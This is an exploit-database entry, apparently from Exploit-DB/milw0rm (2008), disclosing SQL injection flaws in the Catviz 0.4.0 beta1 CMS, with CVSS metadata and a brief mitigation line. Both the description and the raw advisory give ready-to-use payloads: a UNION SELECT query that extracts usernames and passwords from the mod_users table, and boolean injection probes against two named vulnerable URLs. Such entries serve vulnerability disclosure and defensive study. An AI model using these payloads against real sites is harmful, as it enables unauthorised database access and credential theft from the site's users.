Catviz 0.4.0 beta1 SQL Injection Vulnerability

vendor:

Catviz

by:

h0yt3r

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Catviz

Affected Version From: 0.4.0 beta1

Affected Version To: 0.4.0 beta1

Patch Exists: NO

Related CWE: N/A

CPE: a:catviz:catviz:0.4.0_beta1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Catviz 0.4.0 beta1 SQL Injection Vulnerability

Catviz 0.4.0 beta1 suffers from some not correctly verified variables which are used in SQL Querys. An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys. The vulnerable URLs are: http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL] and http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL]. The PoC is: index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/* and index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1 and index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0.

Mitigation:

The user should ensure that all input is properly validated and sanitized before being used in a SQL query.

Source

Exploit-DB raw data:

######################
#
#Catviz 0.4.0 beta1 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: n/a
#
#Homepage: catviz.sourceforge.net
#
##
###
##
#
#This CMS suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL]
#http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL]
#
#PoC:
#index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0
#
#
#You get "Go away you nasty intruder wannabe." when you do a wrong login...
#
#
#######################
#
#Greetz to thund3r, b!zZ!t, haZl0oh, WhiTâ‚¬ $h@Dow, $h4d0wl33t, codeblu815, ramon, Free-Hack and Sys-Flaw and h4ck-y0u.
#
#
#######################
####################### 

# milw0rm.com [2008-06-30]